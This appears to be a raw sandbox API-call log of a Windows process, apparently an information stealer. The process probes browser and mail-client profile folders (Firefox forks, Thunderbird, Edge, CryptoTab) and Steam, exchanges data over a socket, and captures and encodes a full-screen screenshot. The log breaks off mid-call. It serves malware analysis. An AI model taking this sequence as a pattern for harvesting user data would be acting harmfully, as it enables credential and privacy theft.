SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.953] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data", lpFilePart=0x0) returned 0x3c [0279.953] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\", lpFilePart=0x0) returned 0x3d [0279.953] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\edge\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.955] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.955] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience") returned 0x51 [0279.956] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.956] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", lpFilePart=0x0) returned 0x50 [0279.956] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience\\", lpFilePart=0x0) returned 0x51 [0279.956] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\nvidia corporation\\nvidia geforce experience\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.957] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.957] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Steam", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Steam") returned 0x2a [0279.957] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.957] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Steam", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Steam", lpFilePart=0x0) returned 0x29 [0279.957] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Steam\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Steam\\", lpFilePart=0x0) returned 0x2a [0279.957] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Steam\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\steam\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.958] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.959] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.959] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CryptoTab Browser\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data") returned 0x40 [0279.959] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.959] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data", lpFilePart=0x0) returned 0x3f [0279.959] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\", lpFilePart=0x0) returned 0x40 [0279.959] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\cryptotab browser\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.959] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.997] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f184, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.997] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Mozilla\\Firefox", lpDst=0x19f184, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox") returned 0x36 [0279.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f220) returned 1 [0279.998] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox", nBufferLength=0x105, lpBuffer=0x19ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox", lpFilePart=0x0) returned 0x35 [0279.998] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\", nBufferLength=0x105, lpBuffer=0x19ecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\", lpFilePart=0x0) returned 0x36 [0279.998] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mozilla\\firefox\\*"), lpFindFileData=0x19ef48 | out: lpFindFileData=0x19ef48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e4) returned 1 [0279.999] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f184, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.999] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Waterfox", lpDst=0x19f184, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox") returned 0x2f [0280.000] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f220) returned 1 [0280.000] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox", nBufferLength=0x105, lpBuffer=0x19ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox", lpFilePart=0x0) returned 0x2e [0280.000] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\", nBufferLength=0x105, lpBuffer=0x19ecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\", lpFilePart=0x0) returned 0x2f [0280.000] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\waterfox\\*"), lpFindFileData=0x19ef48 | out: lpFindFileData=0x19ef48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e4) returned 1 [0280.001] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f184, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0280.001] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\K-Meleon", lpDst=0x19f184, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon") returned 0x2f [0280.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f220) returned 1 [0280.002] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon", nBufferLength=0x105, lpBuffer=0x19ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon", lpFilePart=0x0) returned 0x2e [0280.002] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\", nBufferLength=0x105, lpBuffer=0x19ecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\", lpFilePart=0x0) returned 0x2f [0280.002] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\k-meleon\\*"), lpFindFileData=0x19ef48 | out: lpFindFileData=0x19ef48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e4) returned 1 [0280.003] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f184, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0280.004] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Thunderbird", lpDst=0x19f184, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird") returned 0x32 [0280.004] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f220) returned 1 [0280.004] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird", nBufferLength=0x105, lpBuffer=0x19ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird", lpFilePart=0x0) returned 0x31 [0280.004] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\", nBufferLength=0x105, lpBuffer=0x19ecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\", lpFilePart=0x0) returned 0x32 [0280.004] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\thunderbird\\*"), lpFindFileData=0x19ef48 | out: lpFindFileData=0x19ef48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e4) returned 1 [0280.007] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f184, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0280.007] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Comodo\\IceDragon", lpDst=0x19f184, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Comodo\\IceDragon") returned 0x37 [0280.007] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f220) returned 1 [0280.007] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Comodo\\IceDragon", nBufferLength=0x105, lpBuffer=0x19ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Comodo\\IceDragon", lpFilePart=0x0) returned 0x36 [0280.007] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Comodo\\IceDragon\\", nBufferLength=0x105, lpBuffer=0x19ecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Comodo\\IceDragon\\", lpFilePart=0x0) returned 0x37 [0280.007] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Comodo\\IceDragon\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\comodo\\icedragon\\*"), lpFindFileData=0x19ef48 | out: lpFindFileData=0x19ef48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e4) returned 1 [0280.009] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f184, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0280.009] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\8pecxstudios\\Cyberfox", lpDst=0x19f184, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox") returned 0x3c [0280.009] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f220) returned 1 [0280.009] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox", nBufferLength=0x105, lpBuffer=0x19ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox", lpFilePart=0x0) returned 0x3b [0280.009] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\", nBufferLength=0x105, lpBuffer=0x19ecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\", lpFilePart=0x0) returned 0x3c [0280.009] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\8pecxstudios\\cyberfox\\*"), lpFindFileData=0x19ef48 | out: lpFindFileData=0x19ef48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.009] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e4) returned 1 [0280.010] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f184, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0280.010] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw", lpDst=0x19f184, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw") returned 0x44 [0280.010] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f220) returned 1 [0280.010] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw", nBufferLength=0x105, lpBuffer=0x19ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw", lpFilePart=0x0) returned 0x43 [0280.010] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw\\", nBufferLength=0x105, lpBuffer=0x19ecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw\\", lpFilePart=0x0) returned 0x44 [0280.010] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\netgate technologies\\blackhaw\\*"), lpFindFileData=0x19ef48 | out: lpFindFileData=0x19ef48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e4) returned 1 [0280.013] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f184, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0280.013] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Moonchild Productions\\Pale Moon", lpDst=0x19f184, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon") returned 0x46 [0280.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f220) returned 1 [0280.013] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon", nBufferLength=0x105, lpBuffer=0x19ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon", lpFilePart=0x0) returned 0x45 [0280.013] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\", nBufferLength=0x105, lpBuffer=0x19ecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\", lpFilePart=0x0) returned 0x46 [0280.013] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\moonchild productions\\pale moon\\*"), lpFindFileData=0x19ef48 | out: lpFindFileData=0x19ef48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e4) returned 1 [0280.016] CoCreateGuid (in: pguid=0x19efd0 | out: pguid=0x19efd0*(Data1=0x80512067, Data2=0x9576, Data3=0x4ff6, Data4=([0]=0x84, [1]=0xae, [2]=0x14, [3]=0xc9, [4]=0x42, [5]=0x58, [6]=0xf8, [7]=0x52))) returned 0x0 [0280.016] CoCreateGuid (in: pguid=0x19ef00 | out: pguid=0x19ef00*(Data1=0xe702400e, Data2=0x4f79, Data3=0x45e3, Data4=([0]=0x8a, [1]=0x68, [2]=0x61, [3]=0x32, [4]=0x8, [5]=0x37, [6]=0x13, [7]=0xa1))) returned 0x0 [0280.016] send (s=0x348, buf=0x211a2ef*, len=171, flags=0) returned 171 [0280.018] recv (in: s=0x348, buf=0x211b490, len=8192, flags=0 | out: buf=0x211b490*) returned 132 [0280.093] GdipCreateFromHWND (hwnd=0x0, graphics=0x19f284) returned 0x0 [0280.095] GdipGetDC (graphics=0x52a1f08, hdc=0x19f294) returned 0x0 [0280.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gdi32", cchWideChar=5, lpMultiByteStr=0x19f234, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gdi32\x9a\x12\x05\x89\x871\x86 «ðkhö\x19", lpUsedDefaultChar=0x0) returned 5 [0280.095] LoadLibraryA (lpLibFileName="gdi32") returned 0x771b0000 [0280.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetDeviceCaps", cchWideChar=13, lpMultiByteStr=0x19f22c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDeviceCaps\x9b\x12\x05\x89\x871\x86 «ðkhö\x19", lpUsedDefaultChar=0x0) returned 13 [0280.097] GetProcAddress (hModule=0x771b0000, lpProcName="GetDeviceCaps") returned 0x77230fe0 [0280.097] GetDeviceCaps (hdc=0x1f010704, index=10) returned 900 [0280.098] GetDeviceCaps (hdc=0x1f010704, index=117) returned 900 [0280.098] GdipReleaseDC (graphics=0x52a1f08, hdc=0x1f010704) returned 0x0 [0280.098] GdipDeleteGraphics (graphics=0x52a1f08) returned 0x0 [0280.195] GdipCreateBitmapFromScan0 (width=1440, height=900, stride=0, format=0x26200a, scan0=0x0, bitmap=0x19f274) returned 0x0 [0280.292] GdipGetImagePixelFormat (image=0x52a1f08, format=0x19f2f4) returned 0x0 [0280.293] GdipGetImageGraphicsContext (image=0x52a1f08, graphics=0x19f300) returned 0x0 [0280.296] GdipSetInterpolationMode (graphics=0x52a2408, interpolationMode=0x4) returned 0x0 [0280.296] GdipSetPixelOffsetMode (graphics=0x52a2408, pixelOffsetMode=0x1) returned 0x0 [0280.296] GdipSetSmoothingMode (graphics=0x52a2408, smoothingMode=0x1) returned 0x0 [0280.424] GetDC (hWnd=0x0) returned 0x10107f0 [0280.429] GetCurrentObject (hdc=0x10107f0, type=0x1) returned 0x1b00017 [0280.430] GetCurrentObject (hdc=0x10107f0, type=0x2) returned 0x1900010 [0280.430] GetCurrentObject (hdc=0x10107f0, type=0x7) returned 0xbf050541 [0280.430] GetCurrentObject (hdc=0x10107f0, type=0x6) returned 0x18a0048 [0280.431] GdipGetDC (graphics=0x52a2408, hdc=0x19f1f4) returned 0x0 [0280.535] BitBlt (hdc=0x5d0109be, x=0, y=0, cx=1440, cy=900, hdcSrc=0x10107f0, x1=0, y1=0, rop=0xcc0020) returned 1 [0280.939] GdipReleaseDC (graphics=0x52a2408, hdc=0x5d0109be) returned 0x0 [0280.943] ReleaseDC (hWnd=0x0, hDC=0x10107f0) returned 1 [0280.943] GdipDeleteGraphics (graphics=0x52a2408) returned 0x0 [0280.953] GdipGetImageEncodersSize (numEncoders=0x19f27c, size=0x19f278) returned 0x0 [0280.954] LocalAlloc (uFlags=0x0, uBytes=0x410) returned 0x553edf8 [0280.954] GdipGetImageEncoders (in: numEncoders=0x5, size=0x410, encoders=0x553edf8 | out: encoders=0x553edf8) returned 0x0 [0280.960] LocalFree (hMem=0x553edf8) returned 0x0 [0280.972] GdipSaveImageToStream (image=0x52a1f08, stream=0x5260030, clsidEncoder=0x19f28c*(Data1=0x557cf406, Data2=0x1a04, Data3=0x11d3, Data4=([0]=0x9a, [1]=0x73, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x1e, [6]=0xf3, [7]=0x2e)), encoderParams=0x0) returned 0x0 [0281.725] CoCreateGuid (in: pguid=0x19efd4 | out: pguid=0x19efd4*(Data1=0x32fc1bef, Data2=0xd3ed, Data3=0x47e5, Data4=([0]=0x81, [1]=0xe, [2]=0x31, [3]=0x71, [4]=0xad, [5]=0x98, [6]=0x2c, [7]=0x50))) returned 0x0 [0281.725] CoCreateGuid (in: 